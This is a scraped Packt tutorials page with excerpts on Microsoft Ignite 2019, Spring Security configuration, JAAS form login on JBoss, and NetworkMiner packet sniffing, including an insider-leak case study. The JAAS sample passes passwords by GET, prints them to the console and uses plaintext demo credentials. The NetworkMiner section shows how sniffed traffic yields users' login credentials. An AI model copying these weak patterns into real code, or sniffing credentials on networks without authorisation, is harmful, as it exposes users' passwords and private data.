Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
All Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - Security

172 Articles
article-image-10-key-announcements-from-microsoft-ignite-2019-you-should-know-about
Sugandha Lahoti
26 Nov 2019
7 min read
Save for later

10 key announcements from Microsoft Ignite 2019 you should know about

Sugandha Lahoti
26 Nov 2019
7 min read
This year’s Microsoft Ignite was jam-packed with new releases and upgrades in Microsoft’s line of products and services. The company elaborated on its growing focus to address the needs of its customers to help them do their business in smarter, more productive and more efficient ways. Most of the products were AI-based and Microsoft was committed to security and privacy. Microsoft Ignite 2019 took place on November 4-8, 2019 in Orlando, Florida and was attended by 26,000 IT implementers and decision-makers, developers, data professionals and people from various industries. There were a total of 175 separate announcements made! We have tried to cover the top 10 here. Microsoft’s Visual Studio IDE is now available on the web The web-based version of Microsoft’s Visual Studio IDE is now available to all developers. Called the Visual Studio Online, this IDE will allow developers to configure a fully configured development environment for their repositories and use the web-based editor to work on their code. Visual Studio Online is deeply integrated with GitHub (also owned by Microsoft), although developers can also attach their own physical and virtual machines to their Visual Studio-based environments. Visual Studio Online’s cloud-hosted environments, as well as extended support for Visual Studio Code and the web UI, are now available in preview. Support for Visual Studio 2019 is in private preview, which you can also sign up for through the Visual Studio Online web portal. Project Cortex will classify all content in a single network Project Cortex is a new service in Microsoft 365 useful to maintain the everyday flow of work in enterprises. Project Cortex collates enterprises generated documents and data, which is often spread across numerous repositories. It uses AI and machine learning to automatically classify all your content into topics to form a knowledge network. Cortex improves individual productivity and organizational intelligence and can be used across Microsoft 365, such as in the Office apps, Outlook, and Microsoft Teams. Project Cortex is now in private preview and will be generally available in the first half of 2020. Single-view device management with ‘Microsoft Endpoint Manager’ Microsoft has combined its Configuration Manager with Intune, its cloud-based endpoint management system to form what they call an Endpoint Manager. ConfigMgr allows enterprises to manage the PCs, laptops, phones, and tablets they issue to their employees. Intune is used for cloud-based management of phones. The Endpoint Manager will provide unique co-management options to organizations to provision, deploy, manage and secure endpoints and applications across their organization. Touted as the most important release of the event by Satya Nadella, this solution will give enterprises a single view of their deployments. ConfigMgr users will now also get a license to Intune to allow them to move to cloud-based management. No-code bot builder ‘Microsoft Power Virtual Agents’ is available in public preview Built on the Azure Bot Framework, Microsoft Power Virtual Agents is a low-code and no-code bot-building solution now available in public preview. Power Virtual Agents enables programmers with little to no developer experience to create and deploy intelligent virtual agents. The solution also includes Azure Machine Learning to help users create and improve conversational agents for personalized customer service. Power Virtual Agents will be generally available Dec. 1. Microsoft’s Chromium-based version of Edge is now more privacy-focused Microsoft Ignite announced the release candidate for Microsoft’s Chromium-based version of Edge browser with the general availability release on January 15. InPrivate search will be available for Microsoft Edge and Microsoft Bing to keep online searches and identities private, giving users more control over their data.  When searching InPrivate, search history and personally identifiable data will not be saved nor be associated back to you. Users’ identities and search histories are completely private. There will also be a new security baseline for the all-new Microsoft Edge. Security baselines are pre-configured groups of security settings and default values that are recommended by the relevant security teams. The next version of Microsoft Edge will feature a new icon symbolizing the major changes in Microsoft Edge, built on the Chromium open source project. It will appear in an Easter egg hunt designed to reward the Insider community. ML.NET 1.4 announces General Availability ML.NET 1.4, Microsoft’s open-source machine learning framework is now generally available. The latest release adds image classification training with the ML.NET API, as well as a relational database loader API for reading data used for training models with ML.NET. ML.NET also includes Model Builder (easy to use UI tool in Visual Studio) and Command-Line Interface to make it super easy to build custom Machine Learning models using AutoML. This release also adds a new preview of the Visual Studio Model Builder extension that supports image classification training from a graphical user interface. A preview of Jupyter support for writing C# and F# code for ML.NET scenarios is also available. Azure Arc extends Azure services across multiple infrastructures One of the most important features of Microsoft Ignite 2019 was Azure Arc. This new service enables Azure services anywhere and extends Azure management to any infrastructure — including those of competitors like AWS and Google Cloud.  With Azure Arc, customers can use Azure’s cloud management experience for their own servers (Linux and Windows Server) and Kubernetes clusters by extending Azure management across environments. Enterprises can also manage and govern resources at scale with powerful scripting, tools, Azure Portal and API, and Azure Lighthouse. Announcing Azure Synapse Analytics Azure Synapse Analytics builds upon Microsoft’s previous offering Azure SQL Data Warehouse. This analytics service combines traditional data warehousing with big data analytics bringing serverless on-demand or provisioned resources—at scale. Using Azure Synapse Analytics, customers can ingest, prepare, manage, and serve data for immediate BI and machine learning applications within the same service. Safely share your big data with Azure Data Share, now generally available As the name suggests, Azure Data Share allows you to safely share your big data with other organizations. Organizations can share data stored in their data lakes with third party organizations outside their Azure tenancy. Data providers wanting to share data with their customers/partners can also easily create a new share, populate it with data residing in a variety of stores and add recipients. It employs Azure security measures such as access controls, authentication, and encryption to protect your data. Azure Data Share supports sharing from SQL Data Warehouse and SQL DB, in addition to Blob and ADLS (for snapshot-based sharing). It also supports in-place sharing for Azure Data Explorer (in preview). Azure Quantum to be made available in private preview Microsoft has been working on Quantum computing for some time now. At Ignite, Microsoft announced that it will be launching Azure Quantum in private preview in the coming months. Azure Quantum is a full-stack, open cloud ecosystem that will bring quantum computing to developers and organizations. Azure Quantum will assemble quantum solutions, software, and hardware across the industry in a  single, familiar experience in Azure. Through Azure Quantum, you can learn quantum computing through a series of tools and learning tutorials, like the quantum katas. Developers can also write programs with Q# and the QDK Solve. Microsoft Ignite 2019 organizers have released an 88-page document detailing about all 175 announcements which you can access here. You can also view the conference Keynote delivered by Satya Nadella on YouTube as well as Microsoft Ignite’s official blog. Facebook mandates Visual Studio Code as default development environment and partners with Microsoft for remote development extensions Exploring .Net Core 3.0 components with Mark J. Price, a Microsoft specialist Yubico reveals Biometric YubiKey at Microsoft Ignite Microsoft announces .NET Jupyter Notebooks
Read more
  • 0
  • 0
  • 4482

article-image-getting-started-spring-security
Packt
14 Mar 2013
14 min read
Save for later

Getting Started with Spring Security

Packt
14 Mar 2013
14 min read
(For more resources related to this topic, see here.) Hello Spring Security Although Spring Security can be extremely difficult to configure, the creators of the product have been thoughtful and have provided us with a very simple mechanism to enable much of the software's functionality with a strong baseline. From this baseline, additional configuration will allow a fine level of detailed control over the security behavior of our application. We'll start with an unsecured calendar application, and turn it into a site that's secured with rudimentary username and password authentication. This authentication serves merely to illustrate the steps involved in enabling Spring Security for our web application; you'll see that there are some obvious flaws in this approach that will lead us to make further configuration refinements. Updating your dependencies The first step is to update the project's dependencies to include the necessary Spring Security .jar files. Update the Maven pom.xml file from the sample application you imported previously, to include the Spring Security .jar files that we will use in the following few sections. Remember that Maven will download the transitive dependencies for each listed dependency. So, if you are using another mechanism to manage dependencies, ensure that you also include the transitive dependencies. When managing the dependencies manually, it is useful to know that the Spring Security reference includes a list of its transitive dependencies. pom.xml <dependency> <groupId>org.springframework.security</groupId> <artifactId>spring-security-config</artifactId> <version>3.1.0.RELEASE</version> </dependency> <dependency> <groupId>org.springframework.security</groupId> <artifactId>spring-security-core</artifactId> <version>3.1.0.RELEASE</version> </dependency> <dependency> <groupId>org.springframework.security</groupId> <artifactId>spring-security-web</artifactId> <version>3.1.0.RELEASE</version> </dependency> Downloading the example code You can download the example code files for all Packt books you have purchased from your account at https://www.packtpub.com. If you purchased this book elsewhere, you can visit https://www.packtpub.com/books/content/support and register to have the files e-mailed directly to you. Using Spring 3.1 and Spring Security 3.1 It is important to ensure that all of the Spring dependency versions match and all the Spring Security versions match; this includes transitive versions. Since Spring Security 3.1 builds with Spring 3.0, Maven will attempt to bring in Spring 3.0 dependencies. This means, in order to use Spring 3.1, you must ensure to explicitly list the Spring 3.1 dependencies or use Maven's dependency management features, to ensure that Spring 3.1 is used consistently. Our sample applications provide an example of the former option, which means that no additional work is required by you. In the following code, we present an example fragment of what is added to the Maven pom.xml file to utilize Maven's dependency management feature, to ensure that Spring 3.1 is used throughout the entire application: <project ...> ... <dependencyManagement> <dependencies> <dependency> <groupId>org.springframework</groupId> <artifactId>spring-aop</artifactId> <version>3.1.0.RELEASE</version> </dependency> … list all Spring dependencies (a list can be found in our sample application's pom.xml ... <dependency> <groupId>org.springframework</groupId> <artifactId>spring-web</artifactId> <version>3.1.0.RELEASE</version> </dependency> </dependencies> </dependencyManagement> </project> If you are using Spring Tool Suite, any time you update the pom.xml file, ensure you right-click on the project and navigate to Maven | Update Project…, and select OK, to update all the dependencies. Implementing a Spring Security XML configuration file The next step in the configuration process is to create an XML configuration file, representing all Spring Security components required to cover standard web requests.Create a new XML file in the src/main/webapp/WEB-INF/spring/ directory with the name security.xml and the following contents. Among other things, the following file demonstrates how to require a user to log in for every page in our application, provide a login page, authenticate the user, and require the logged-in user to be associated to ROLE_USER for every URL:URL element: src/main/webapp/WEB-INF/spring/security.xml <?xml version="1.0" encoding="UTF-8"?> <bean:beans xsi_schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-3.1.xsd http://www.springframework.org/schema/security http://www.springframework.org/schema/security/spring-security- 3.1.xsd"> <http auto-config="true"> <intercept-url pattern="/**" access="ROLE_USER"/> </http> <authentication-manager> <authentication-provider> <user-service> <user name="[email protected]" password="user1" authorities="ROLE_USER"/> </user-service> </authentication-provider> </authentication-manager> </bean:beans> If you are using Spring Tool Suite, you can easily create Spring configuration files by using File | New Spring Bean Configuration File. This wizard allows you to select the XML namespaces you wish to use, making configuration easier by not requiring the developer to remember the namespace locations and helping prevent typographical errors. You will need to manually change the schema definitions as illustrated in the preceding code. This is the only Spring Security configuration required to get our web application secured with a minimal standard configuration. This style of configuration, using a Spring Security-specific XML dialect, is known as the security namespace style, named after the XML namespace (http://www.springframework.org/schema/security) associated with the XML configuration elements. Let's take a minute to break this configuration apart, so we can get a high-level idea of what is happening. The <http> element creates a servlet filter, which ensures that the currently logged-in user is associated to the appropriate role. In this instance, the filter will ensure that the user is associated with ROLE_USER. It is important to understand that the name of the role is arbitrary. Later, we will create a user with ROLE_ADMIN and will allow this user to have access to additional URLs that our current user does not have access to. The <authentication-manager> element is how Spring Security authenticates the user. In this instance, we utilize an in-memory data store to compare a username and password. Our example and explanation of what is happening are a bit contrived. An inmemory authentication store would not work for a production environment. However, it allows us to get up and running quickly. We will incrementally improve our understanding of Spring Security as we update our application to use production quality security . Users who dislike Spring's XML configuration will be disappointed to learn that there isn't an alternative annotation-based or Java-based configuration mechanism for Spring Security, as there is with Spring Framework. There is an experimental approach that uses Scala to configure Spring Security, but at the time of this writing, there are no known plans to release it. If you like, you can learn more about it at https://github.com/tekul/scalasec/. Still, perhaps in the future, we'll see the ability to easily configure Spring Security in other ways. Although annotations are not prevalent in Spring Security, certain aspects of Spring Security that apply security elements to classes or methods are, as you'd expect, available via annotations. Updating your web.xml file The next steps involve a series of updates to the web.xml file. Some of the steps have already been performed because the application was already using Spring MVC. However, we will go over these requirements to ensure that these more fundamental Spring requirements are understood, in the event that you are using Spring Security in an application that is not Spring-enabled. ContextLoaderListener The first step of updating the web.xml file is to ensure that it contains the o.s.w.context.ContextLoaderListener listener, which is in charge of starting and stopping the Spring root ApplicationContext interface. ContextLoaderListener determines which configurations are to be used, by looking at the <context-param> tag for contextConfigLocation. It is also important to specify where to read the Spring configurations from. Our application already has ContextLoaderListener added, so we only need to add the newly created security.xml configuration file, as shown in the following code snippet: src/main/webapp/WEB-INF/web.xml <context-param> <param-name>contextConfigLocation</param-name> <param-value> /WEB-INF/spring/services.xml /WEB-INF/spring/i18n.xml /WEB-INF/spring/security.xml </param-value> </context-param> <listener> <listener-class> org.springframework.web.context.ContextLoaderListener </listener-class> </listener> The updated configuration will now load the security.xml file from the /WEB-INF/spring/ directory of the WAR. As an alternative, we could have used /WEB-INF/spring/*.xml to load all the XML files found in /WEB-INF/spring/. We choose not to use the *.xml notation to have more control over which files are loaded. ContextLoaderListener versus DispatcherServlet You may have noticed that o.s.web.servlet.DispatcherServlet specifies a contextConfigLocation component of its own. src/main/webapp/WEB-INF/web.xml <servlet> <servlet-name>Spring MVC Dispatcher Servlet</servlet-name> <servlet-class> org.springframework.web.servlet.DispatcherServlet </servlet-class> <init-param> <param-name>contextConfigLocation</param-name> <param-value> /WEB-INF/mvc-config.xml </param-value> </init-param> <load-on-startup>1</load-on-startup> </servlet> DispatcherServlet creates o.s.context.ApplicationContext, which is a child of the root ApplicationContext interface. Typically, Spring MVC-specific components are initialized in the ApplicationContext interface of DispatcherServlet, while the rest are loaded by ContextLoaderListener. It is important to know that beans in a child ApplicationContext (such as those created by DispatcherServlet) can reference beans of its parent ApplicationContext (such as those created by ContextLoaderListener). However, the parent ApplicationContext cannot refer to beans of the child ApplicationContext. This is illustrated in the following diagram where childBean can refer to rootBean, but rootBean cannot refer to childBean. As with most usage of Spring Security, we do not need Spring Security to refer to any of the MVC-declared beans. Therefore, we have decided to have ContextLoaderListener initialize all of Spring Security's configuration. springSecurityFilterChain The next step is to configure springSecurityFilterChain to intercept all requests by updating web.xml. Servlet <filter-mapping> elements are considered in the order that they are declared. Therefore, it is critical for springSecurityFilterChain to be declared first, to ensure the request is secured prior to any other logic being invoked. Update your web.xml file with the following configuration: src/main/webapp/WEB-INF/web.xml </listener> <filter> <filter-name>springSecurityFilterChain</filter-name> <filter-class> org.springframework.web.filter.DelegatingFilterProxy </filter-class> </filter> <filter-mapping> <filter-name>springSecurityFilterChain</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <servlet> Not only is it important for Spring Security to be declared as the first <filter-mapping> element, but we should also be aware that, with the example configuration, Spring Security will not intercept forwards, includes, or errors. Often, it is not necessary to intercept other types of requests, but if you need to do this, the dispatcher element for each type of request should be included in <filter-mapping>. We will not perform these steps for our application, but you can see an example, as shown in the following code snippet: src/main/webapp/WEB-INF/web.xml <filter-mapping> <filter-name>springSecurityFilterChain</filter-name> <url-pattern>/*</url-pattern> <dispatcher>REQUEST</dispatcher> <dispatcher>ERROR</dispatcher> ... </filter-mapping> DelegatingFilterProxy The o.s.web.filter.DelegatingFilterProxy class is a servlet filter provided by Spring Web that will delegate all work to a Spring bean from the root ApplicationContext that must implement javax.servlet.Filter. Since, by default, the bean is looked up by name, using the value of <filter-name>, we must ensure we use springSecurityFilterChain as the value of <filter-name>. Pseudo-code for how o.s.web.filter.DelegatingFilterProxy works for our web.xml file can be found in the following code snippet: public class DelegatingFilterProxy implements Filter { void doFilter(request, response, filterChain) { Filter delegate = applicationContet.getBean("springSecurityFilterChain") delegate.doFilter(request,response,filterChain); } } FilterChainProxy When working in conjunction with Spring Security, o.s.web.filter. DelegatingFilterProxy will delegate to Spring Security's o.s.s.web. FilterChainProxy, which was created in our minimal security.xml file. FilterChainProxy allows Spring Security to conditionally apply any number of servlet filters to the servlet request. We will learn more about each of the Spring Security filters and their role in ensuring that our application is properly secured, throughout the rest of the book. The pseudo-code for how FilterChainProxy works is as follows: public class FilterChainProxy implements Filter { void doFilter(request, response, filterChain) { // lookup all the Filters for this request List<Filter> delegates = lookupDelegates(request,response) // invoke each filter unless the delegate decided to stop for delegate in delegates { if continue processing delegate.doFilter(request,response,filterChain) } // if all the filters decide it is ok allow the // rest of the application to run if continue processing filterChain.doFilter(request,response) } } Due to the fact that both DelegatingFilterProxy and FilterChainProxy are the front door to Spring Security, when used in a web application, it is here that you would add a debug point when trying to figure out what is happening. Running a secured application If you have not already done so, restart the application and visit http://localhost:8080/calendar/, and you will be presented with the following screen: Great job! We've implemented a basic layer of security in our application, using Spring Security. At this point, you should be able to log in using [email protected] as the User and user1 as the Password ([email protected]/user1). You'll see the calendar welcome page, which describes at a high level what to expect from the application in terms of security. Common problems Many users have trouble with the initial implementation of Spring Security in their application. A few common issues and suggestions are listed next. We want to ensure that you can run the example application and follow along! Make sure you can build and deploy the application before putting Spring Security in place. Review some introductory samples and documentation on your servlet container if needed. It's usually easiest to use an IDE, such as Eclipse, to run your servlet container. Not only is deployment typically seamless, but the console log is also readily available to review for errors. You can also set breakpoints at strategic locations, to be triggered on exceptions to better diagnose errors. If your XML configuration file is incorrect, you will get this (or something similar to this): org.xml.sax.SAXParseException: cvc-elt.1: Cannot find the declaration of element 'beans'. It's quite common for users to get confused with the various XML namespace references required to properly configure Spring Security. Review the samples again, paying attention to avoid line wrapping in the schema declarations, and use an XML validator to verify that you don't have any malformed XML. If you get an error stating "BeanDefinitionParsingException: Configuration problem: Unable to locate Spring NamespaceHandler for XML schema namespace [http://www.springframework.org/ schema/security] ...", ensure that the spring-security-config- 3.1.0.RELEASE.jar file is on your classpath. Also ensure the version matches the other Spring Security JARs and the XML declaration in your Spring configuration file. Make sure the versions of Spring and Spring Security that you're using match and that there aren't any unexpected Spring JARs remaining as part of your application. As previously mentioned, when using Maven, it can be a good idea to declare the Spring dependencies in the dependency management section.
Read more
  • 0
  • 0
  • 4411

article-image-jaas-based-security-authentication-jsps
Packt
18 Nov 2013
9 min read
Save for later

JAAS-based security authentication on JSPs

Packt
18 Nov 2013
9 min read
(For more resources related to this topic, see here.) The deployment descriptor is the main configuration file of all the web applications. The container first looks out for the deployment descriptor before starting any application. The deployment descriptor is an XML file, web.xml, inside the WEB-INF folder. If you look at the XSD of the web.xml file, you can see the security-related schema. The schema can be accessed using the following URL: http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd. The following is the schema element available in the XSD: <xsd:element name="security-constraint" type="j2ee:securityconstraintType"/> <xsd:element name="login-config" type="j2ee:login-configType"/> <xsd:element name="security-role "type="j2ee:security-roleType"/> Getting ready You will need the following to demonstrate authentication and authorization: JBoss 7 Eclipse Indigo 3.7 Create a dynamic web project and name it Security Demo Create a package, com.servlets Create an XML file in the WebContent folder, jboss-web.xml Create two JSP pages, login.jsp and logoff.jsp How to do it... Perform the following steps to achieve JAAS-based security for JSPs: Edit the login.jsp file with the input fields j_username, j_password, and submit it to SecurityCheckerServlet: <%@ page contentType="text/html; charset=UTF-8" %> <%@ page language="java" %> <html > <HEAD> <TITLE>PACKT Login Form</TITLE> <SCRIPT> function submitForm() { var frm = document. myform; if( frm.j_username.value == "" ) { alert("please enter your username, its empty"); frm.j_username.focus(); return ; } if( frm.j_password.value == "" ) { alert("please enter the password,its empty"); frm.j_password.focus(); return ; } frm.submit(); } </SCRIPT> </HEAD> <BODY> <FORM name="myform" action="SecurityCheckerServlet" METHOD=get> <TABLE width="100%" border="0" cellspacing="0" cellpadding= "1" bgcolor="white"> <TABLE width="100%" border="0" cellspacing= "0" cellpadding="5"> <TR align="center"> <TD align="right" class="Prompt"></TD> <TD align="left"> <INPUT type="text" name="j_username" maxlength=20> </TD> </TR> <TR align="center"> <TD align="right" class="Prompt"> </TD> <TD align="left"> <INPUT type="password" name="j_password" maxlength=20 > <BR> <TR align="center"> <TD align="right" class="Prompt"> </TD> <TD align="left"> <input type="submit" onclick="javascript:submitForm();" value="Login"> </TD> </TR> </TABLE> </FORM> </BODY> </html> The j_username and j_password are the indicators of using form-based authentication. Let's modify the web.xml file to protect all the files that end with .jsp. If you are trying to access any JSP file, you would be given a login form, which in turn calls a SecurityCheckerServlet file to authenticate the user. You can also see role information is displayed. Update the web.xml file as shown in the following code snippet. We have used 2.5 xsd. The following code needs to be placed in between the webapp tag in the web.xml file: <display-name>jaas-jboss</display-name> <welcome-file-list> <welcome-file>index.html</welcome-file> <welcome-file>index.htm</welcome-file> <welcome-file>index.jsp</welcome-file> <welcome-file>default.html</welcome-file> <welcome-file>default.htm</welcome-file> <welcome-file>default.jsp</welcome-file> </welcome-file-list> <security-constraint> <web-resource-collection> <web-resource-name>something</web-resource-name> <description>Declarative security tests</description> <url-pattern>*.jsp</url-pattern> <http-method>HEAD</http-method> <http-method>GET</http-method> <http-method>POST</http-method> <http-method>PUT</http-method> <http-method>DELETE</http-method> </web-resource-collection> <auth-constraint> <role-name>role1</role-name> </auth-constraint> <user-data-constraint> <description>no description</description> <transport-guarantee>NONE</transport-guarantee> </user-data-constraint> </security-constraint> <login-config> <auth-method>FORM</auth-method> <form-login-config> <form-login-page>/login.jsp</form-login-page> <form-error-page>/logoff.jsp</form-error-page> </form-login-config> </login-config> <security-role> <description>some role</description> <role-name>role1</role-name> </security-role> <security-role> <description>packt managers</description> <role-name>manager</role-name> </security-role> <servlet> <description></description> <display-name>SecurityCheckerServlet</display-name> <servlet-name>SecurityCheckerServlet</servlet-name> <servlet-class>com.servlets.SecurityCheckerServlet </servlet-class> </servlet> <servlet-mapping> <servlet-name>SecurityCheckerServlet</servlet-name> <url-pattern>/SecurityCheckerServlet</url-pattern> </servlet-mapping> JAAS Security Checker and Credential Handler: Servlet is a security checker. Since we are using JAAS, the standard framework for authentication, in order to execute the following program you need to import org.jboss.security.SimplePrincipal and org.jboss.security.auth.callback.SecurityAssociationHandle and add all the necessary imports. In the following SecurityCheckerServlet, we are getting the input from the JSP file and passing it to the CallbackHandler. We are then passing the Handler object to the LoginContext class which has the login() method to do the authentication. On successful authentication, it will create Subject and Principal for the user, with user details. We are using iterator interface to iterate the LoginContext object to get the user details retrieved for authentication. In the SecurityCheckerServlet Class: package com.servlets; public class SecurityCheckerServlet extends HttpServlet { private static final long serialVersionUID = 1L; public SecurityCheckerServlet() { super(); } protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { char[] password = null; PrintWriter out=response.getWriter(); try { SecurityAssociationHandler handler = new SecurityAssociationHandler(); SimplePrincipal user = new SimplePrincipal(request.getParameter ("j_username")); password=request.getParameter("j_password"). toCharArray(); handler.setSecurityInfo(user, password); System.out.println("password"+password); CallbackHandler myHandler = new UserCredentialHandler(request.getParameter ("j_username"),request.getParameter ("j_password")); LoginContext lc = new LoginContext("other", handler); lc.login(); Subject subject = lc.getSubject(); Set principals = subject.getPrincipals(); List l=new ArrayList(); Iterator it = lc.getSubject().getPrincipals(). iterator(); while (it.hasNext()) { System.out.println("Authenticated: " + it.next().toString() + "<br>"); out.println("<b><html><body><font color='green'>Authenticated: " + request.getParameter("j_username")+" <br/>"+it.next().toString() + "<br/></font></b></body></html>"); } it = lc.getSubject().getPublicCredentials (Properties.class).iterator(); while (it.hasNext()) System.out.println(it.next().toString()); lc.logout(); } catch (Exception e) { out.println("<b><font color='red'>failed authenticatation.</font>-</b>"+e); } } protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { } } Create the UserCredentialHandler file: package com.servlets; class UserCredentialHandler implements CallbackHandler { private String user, pass; UserCredentialHandler(String user, String pass) { super(); this.user = user; this.pass = pass; } @Override public void handle(Callback[] callbacks) throws IOException, UnsupportedCallbackException { for (int i = 0; i < callbacks.length; i++) { if (callbacks[i] instanceof NameCallback) { NameCallback nc = (NameCallback) callbacks[i]; nc.setName(user); } else if (callbacks[i] instanceof PasswordCallback) { PasswordCallback pc = (PasswordCallback) callbacks[i]; pc.setPassword(pass.toCharArray()); } else { throw new UnsupportedCallbackException (callbacks[i], "Unrecognized Callback"); } } } } In the jboss-web.xml file: <?xml version="1.0" encoding="UTF-8"?> <jboss-web> <security-domain>java:/jaas/other</security-domain> </jboss-web> Other is the name of the application policy defined in the login-config.xml file. All these will be packed in as a .war file. Configuring the JBoss Application Server. Go to jboss-5.1.0.GAserver defaultconflogin-config.xml in JBoss. If you look at the file, you can see various configurations for database LDAP and a simple one using the properties file, which I have used in the following code snippet: <application-policy name="other"> <!-- A simple server login module, which can be used when the number of users is relatively small. It uses two properties files: users.properties, which holds users (key) and their password (value). roles.properties, which holds users (key) and a commaseparated list of their roles (value). The unauthenticatedIdentity property defines the name of the principal that will be used when a null username and password are presented as is the case for an unauthenticated web client or MDB. If you want to allow such users to be authenticated add the property, e.g., unauthenticatedIdentity="nobody" --> <authentication> <login-module code="org.jboss.security.auth.spi.UsersRoles LoginModule" flag="required"/> <module-option name="usersProperties"> users.properties</module-option> <module-option name="rolesProperties"> roles.properties</module-option> <module-option name="unauthenticatedIdentity"> nobody</module-option> </authentication> </application-policy> Create the users.properties file in the same folder. The following is the Users. properties file with username mapped with role. User.properties anjana=anjana123 roles.properties anjana=role1 Restart the server. How it works... JAAS consists of a set of interfaces to handle the authentication process. They are: The CallbackHandler and Callback interfaces The LoginModule interface LoginContext The CallbackHandler interface gets the user credentials. It processes the credentials and passes them to LoginModule, which authenticates the user. JAAS is container specific. Each container will have its own implementation, here we are using JBoss application server to demonstrate JAAS. In my previous example, I have explicitly called JASS interfaces. UserCredentialHandler implements the CallbackHandler interfaces. So, CallbackHandlers are storage spaces for the user credentials and the LoginModule authenticates the user. LoginContext bridges the CallbackHandler interface with LoginModule. It passes the user credentials to LoginModule interfaces for authentication: CallbackHandler myHandler = new UserCredentialHandler(request. getParameter("j_username"),request.getParameter("j_password")); LoginContext lc = new LoginContext("other", handler); lc.login() The web.xml file defines the security mechanisms and also points us to the protected resources in our application. The following screenshot shows a failed authentication window: The following screenshot shows a successful authentication window: Summary We introduced the JAAs-based mechanism of applying security to authenticate and authorize the users to the application Resources for Article: Further resources on this subject: Spring Security 3: Tips and Tricks [Article] Spring Security: Configuring Secure Passwords [Article] Migration to Spring Security 3 [Article]
Read more
  • 0
  • 0
  • 4373
Visually different images

article-image-analyzing-data-packets
Packt
08 Feb 2016
7 min read
Save for later

Analyzing Data Packets

Packt
08 Feb 2016
7 min read
In this article by Samir Datt, the author of the book Learning Network Forensics, you will learn to get your hands dirty by actually capturing and analyzing network traffic. We will learn how to use different software tools to capture and analyze network traffic with real-world scenarios of accessing data over the Internet and the resultant network capture. The article will cover the following topics: Packet sniffing and analysis using NetworkMiner Case study – sniffing out an insider (For more resources related to this topic, see here.) Packet sniffing and analysis using NetworkMiner NetworkMiner is a passive network sniffing or network forensic tool. It is called a passive tool as it does not send out requests—it sits silently on the network, capturing every packet in the promiscuous mode. NetworkMiner is host-centric. This means that it will classify data based on hosts rather than packets, which is what most sniffers such as Wireshark do. The different steps to NetworkMiner usage are as follows: Download and install the NetworkMiner. Then, configure it. Capture the data in NetworkMiner. Finally, analyze the data. NetworkMiner is available for download at SourceForge: http://sourceforge.net/projects/networkminer/. Though NetworkMiner is not as well known as it should be, it's host-centric approach is refreshingly different and effective. Allowing the users to classify traffic based on the IP addresses and not packets helps us to zero in on activities related to the specific computers that are under suspicion or are being investigated. The NetworkMiner interface is shown in the following screenshot: To begin using NetworkMiner, we start by selecting a network adapter from the drop-down list. NetworkMiner places this adapter in the promiscuous mode. Clicking Start begins NetworkMiner on the task of packet collection. While NetworkMiner has the capability of collecting data packets across the network, its real strength comes in to play after the data has been collected. In most of the scenarios, it makes more sense to use Wireshark to capture packets and then use NetworkMiner to do the analysis on the .pcap file that is captured. As soon as data capturing begins, NetworkMiner swings into action by sorting the packets based on the host IP addresses. This is extremely useful since it allows us to identify traffic that is specific to a single IP on the network. Consider that we have a single suspect with a known IP on the network, then we can focus our investigative resources on just that single IP address. Some really great additional features include the ability to identify the media access control (MAC) address of the network interface card (NIC) in use and also the OS of the suspect system. In fact, the icon on the left-hand side of the IP address shows the OS icon, if detected, as shown in the following screenshot: As we can see in the preceding image, some of the devices that are connected to the network under investigation are Windows and BSD devices. The next tab is the Frames tab. The Frames tab view is similar to that of Wireshark and is perhaps one of the lesser used tabs in NetworkMiner, due to the fact that there are so many other richer options available, as shown in the following screenshot: It gives us inputs on the packet length, source and destination IP address, as well as time to live (TTL) of the packet. NetworkMiner has the ability to collate the packets and then reconstruct the constituent files for viewing by the investigator. These files are shown in the Files tab. Assuming that some files were copied/accessed over a network share, it would be possible to view the reconstructed file in the Files tab. The Files tab also depicts the SSL certificates used over a network. This can also be useful from an investigation perspective, as shown in the following screenshot: Similarly, if pictures have been viewed over the network, these are reconstructed in the Images tab. In fact, this can be quite useful especially, when scanned documents are a part of the network traffic. This may happen when the bad guys try to avoid detection from the keyword-based searching. The following is an image depicting the Images tab: The reconstructed graphics are usually depicted as thumbnails. Right-clicking the thumbnail allows us to open the graphic in a picture editor/viewer. DNS queries are also accessible via another tab, as shown in the following image: There are additional tabs available that are notable from the perspective of an investigation. One of these is the Credentials tab. This stores the information related to interactions involving the exchange of credentials with resources that require logons. It is not uncommon to find username and passwords for plain-text logons listed under this tab. One can also find user accounts for popular sites such as Gmail and Facebook. A screenshot of the Credentials tab is as follows: In a number of cases, it is possible to determine the username and passwords of certain websites. Another great feature in NetworkMiner is the ability to import a set of keywords that are to be used to search within packets in the captured .pcap file. This allows us to separate packets that contain our keywords of interest. A screenshot is as follows: Case study – tracking down an insider XYZ Corporation, a medium-sized Government contractor, found that it had begun to lose business to a tiny competitor that seemed to know exactly what the sales team at XYZ Corp was planning. The senior management suspected that an insider was leaking information to the competitor. A network forensic 007 was called in to investigate the problem. A preliminary information-gathering exercise was initiated and a list of keywords was compiled to help in identifying packets that contained information of interest. A list of possible suspects, who had access to the confidential information, was also compiled. The specific network segment relating to the department in question was put under network surveillance. Wireshark was deployed to capture all the network traffic. Additional storage was made available to store the .pcap files generated by Wireshark. The collected .pcap files were analyzed using NetworkMiner. The following screenshot depicts Wireshark capturing traffic: An in-depth analysis of network traffic produced the following findings: An image showing the registration certificate of the company that was competing with XYZ Corp, providing the names of the directors The address of the company in the registration certificate was the residential address of the sales manager of XYZ Corp E-mail communications using personal e-mail addresses between the directors of the competing company and the senior manager sales of XYZ Corp Further offline analysis showed that the sales manager's wife was related to the director of the competing company It was also seen that the sales manager was connecting to the office Wi-Fi network using his android phone The sales manager was noted to be accessing cloud storage using his phone and transferring important files and contact lists It was noted that the sales manager was also in close communication with a female employee in the accounts department and that the connection was intimate The information collected so far was very indicative of the sales manager's involvement with competitors. Based on the preceding network forensics exercise, it was recommended that a full-fledged digital forensic exercise should be initiated, including that of his assigned laptop and phone device. It was also recommended that sufficient corroborating evidence should be collected using log analysis, RAM analysis, and disk forensics to initiate legal/breach of trust action against the 